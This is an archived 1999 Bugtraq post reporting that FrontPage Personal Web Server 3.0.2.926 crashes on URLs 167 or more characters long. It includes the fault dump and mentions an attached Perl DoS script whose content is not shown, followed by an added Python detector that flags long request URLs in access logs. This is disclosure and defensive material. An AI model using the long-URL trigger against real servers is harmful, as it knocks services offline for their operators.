[11321] in bugtraq
Crash FrontPage Remotely...
daemon@ATHENA.MIT.EDU (Narr0w)
Mon Aug 9 22:20:14 1999
Mime-Version: 1.0
Content-Type: multipart/mixed; boundary="----=_NextPart_000_01BEE0E6.03BD7380"
Content-Transfer-Encoding: 7bit
Message-Id: <199908071207.FAA23507@mb3.mailbank.com>
Date: Sat, 7 Aug 1999 15:03:32 +0300
Reply-To: Narr0w <Narr0w@THEHACKERS.COM>
From: Narr0w <Narr0w@THEHACKERS.COM>
X-To: bugtraq@securityfocus.com
To: BUGTRAQ@SECURITYFOCUS.COM
This is a multi-part message in MIME format.
------=_NextPart_000_01BEE0E6.03BD7380
Content-Type: text/plain; charset=KOI8-R
Content-Transfer-Encoding: 7bit
Hello BugTraq friends,
Sorry if it was already in bugtraq, but:
FrontPage PWD32/3.0.2.926 for Win'XX crashes when the url is 167+ long.
I tested it only on: Windows'95 FrontPage Server Extensions Version:
3.0.2.926 Version: FrontPage-PWS32/3.0.2.926.
Here is the error message:
VHTTPD32 caused an invalid page fault in
module VHTTPD32.EXE at 0137:0040aaed.
Registers:
EAX=010d7740 CS=0137 EIP=0040aaed EFLGS=00010202
EBX=00000000 SS=013f ESP=010d53d0 EBP=010d0074
ECX=010d7740 DS=013f ESI=010d7740 FS=13c7
EDX=000000a8 ES=013f EDI=bff92ac1 GS=0000
Bytes at CS:EIP:
ff 75 10 56 68 94 01 00 00 eb 1c 68 00 24 40 00
Stack dump:
00000010 010d7740 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000
00000000 00000000 00000000 00000000 00000000
00000000
I attached a Perl script that connects to the host & sends a 167 long URL.
Narr0w
------=_NextPart_000_01BEE0E6.03BD7380
Content-Type: application/octet-stream; name="DoS.zip"
Content-Transfer-Encoding: base64
Content-Description: DoS (ZIP File)
Content-Disposition: attachment; filename="DoS.zip"
------=_NextPart_000_01BEE0E6.03BD7380--
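
Added example (not part of the original post or its attachment): a Python check that scans access logs from a proxy or front end for request URLs at or above the 167 length given in the report. The Common Log Format input, the constructed sample lines and all function names are assumptions; the report does not say how the length is counted, so the logged request URL is measured as-is.

```python
import re
from collections import Counter

# Threshold from the report: the server faults when the URL is "167+ long".
# Assumption: length is counted over the request URL exactly as logged.
URL_LIMIT = 167

# Common Log Format: host ident user [time] "request" status bytes
CLF = re.compile(r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
                 r'"(?P<req>[^"]*)" (?:\d{3}|-) (?:\d+|-)')

def request_target(req):
    """Return the URL from a logged request line, or None if there is none."""
    parts = req.split(" ")
    if len(parts) < 2:
        return None                      # e.g. "-" for an empty request
    if len(parts) >= 3 and parts[-1].startswith("HTTP/"):
        return " ".join(parts[1:-1])     # keeps URLs with raw spaces whole
    return " ".join(parts[1:])           # no version token (HTTP/0.9 style)

def flag_long_urls(lines, limit=URL_LIMIT):
    """Return (host, time, url_length) for each request at or above limit."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue                     # skip lines that are not CLF
        url = request_target(m["req"])
        if url is not None and len(url) >= limit:
            hits.append((m["host"], m["time"], len(url)))
    return hits

def hits_per_host(hits):
    """Count flagged requests per source address."""
    return Counter(host for host, _, _ in hits)

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [07/Aug/1999:15:03:32 +0300] "GET /index.htm HTTP/1.0" 200 1043',
    '198.51.100.7 - - [07/Aug/1999:15:04:01 +0300] "GET /' + "a" * 165 + ' HTTP/1.0" 404 -',
    '198.51.100.7 - - [07/Aug/1999:15:04:02 +0300] "GET /' + "a" * 166 + ' HTTP/1.0" - -',
    '198.51.100.7 - - [07/Aug/1999:15:04:09 +0300] "GET /' + "a" * 299 + '" - -',
    'garbage line',
]

if __name__ == "__main__":
    for host, when, length in flag_long_urls(SAMPLE):
        print(f"{when} {host} url_length={length}")
```

A server that faults on the request may never write its own log entry, so the log should come from a component in front of it.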